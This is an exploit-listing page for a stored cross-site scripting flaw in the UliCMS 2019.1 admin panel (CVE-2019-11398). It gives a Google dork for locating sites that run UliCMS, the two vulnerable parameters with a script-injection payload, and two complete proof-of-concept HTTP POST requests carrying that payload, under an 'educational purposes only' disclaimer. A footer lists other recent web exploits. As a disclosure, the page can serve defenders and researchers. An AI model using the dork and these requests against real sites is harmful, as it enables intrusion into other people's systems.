Ulicms 2019.1 spitting lama persistent crosssite scripting Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-06-10 | Type : webapps | Platform : php
This exploit / vulnerability Ulicms 2019.1 spitting lama persistent crosssite scripting is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: UliCMS 2019.1 "Spitting Lama" - Stored Cross-Site Scripting
# Google Dork: intext:"by UliCMS"
# Date: 2019-05-12
# Exploit Author: Unk9vvN
# Vendor Homepage: https://en.ulicms.de
# Software Link: https://www.ulicms.de/aktuelles.html?single=ulicms-20191-spitting-lama-ist-fertig
# Version: 2019.1
# Tested on: Kali Linux
# CVE : CVE-2019-11398


# Description
# This vulnerability is in the authentication state and is located in the CMS management panel, and the type of vulnerability is Stored and the vulnerability parameters are as follows.

# Vuln One
# URI: POST /ulicms/admin/index.php?action=languages
# Parameter: name="><script>alert('UNK9VVN')</script>

# Vuln Two
# URI: POST /ulicms/admin/index.php?action=pages_edit&page=23
# Parameter: systemname="><script>alert('UNK9VVN')</script>


#
# PoC POST (Cross Site Scripting Stored)
#
POST /ulicms/admin/index.php HTTP/1.1
Host: XXXXXXXX.ngrok.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=languages
Content-Type: application/x-www-form-urlencoded
Content-Length: 165
Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=LanguageController&sMethod=create&language_code=U9N&name=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E


#
# PoC POST (Cross Site Scripting Stored)
#
POST /ulicms/admin/index.php HTTP/1.1
Host: XXXXXXXX.ngrok.io
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://XXXXXXXX.ngrok.io/ulicms/admin/index.php?action=pages_edit&page=23
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 904
Cookie: 5cfc346c4b87e_SESSION=mm4j0oak7boshm2fsn5ttimip8
Connection: close
DNT: 1

csrf_token=c95ab2823eccb876804606aa6c60f4d9&sClass=PageController&sMethod=edit&edit_page=edit_page&page_id=23&systemname=%22%3E%3Cscript%3Ealert%28%27UNK9VVN%27%29%3C%2Fscript%3E&page_title=UNK9VVN&alternate_title=assdasdasd&show_headline=1&type=page&language=en&menu=top&position=0&parent=NULL&activated=1&target=_self&hidden=0&category=1&menu_image=&redirection=&link_to_language=&meta_description=&meta_keywords=&article_author_name=&article_author_email=&comment_homepage=&article_date=2019-06-09T00%3A40%3A01&excerpt=&og_title=&og_description=&og_type=&og_image=&list_type=null&list_language=&list_category=0&list_menu=&list_parent=NULL&list_order_by=title&list_order_direction=asc&limit=0&list_use_pagination=0&module=null&video=&audio=&image_url=&text_position=before&article_image=&autor=1&group_id=1&comments_enabled=null&cache_control=auto&theme=&access%5B%5D=all&custom_data=%7B%0A%0A%7D&page_content=


# Discovered by:
t.me/Unk9vvN

Ulicms 2019.1 spitting lama persistent crosssite scripting


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Ulicms 2019.1 spitting lama persistent crosssite scripting Vulnerability / Exploit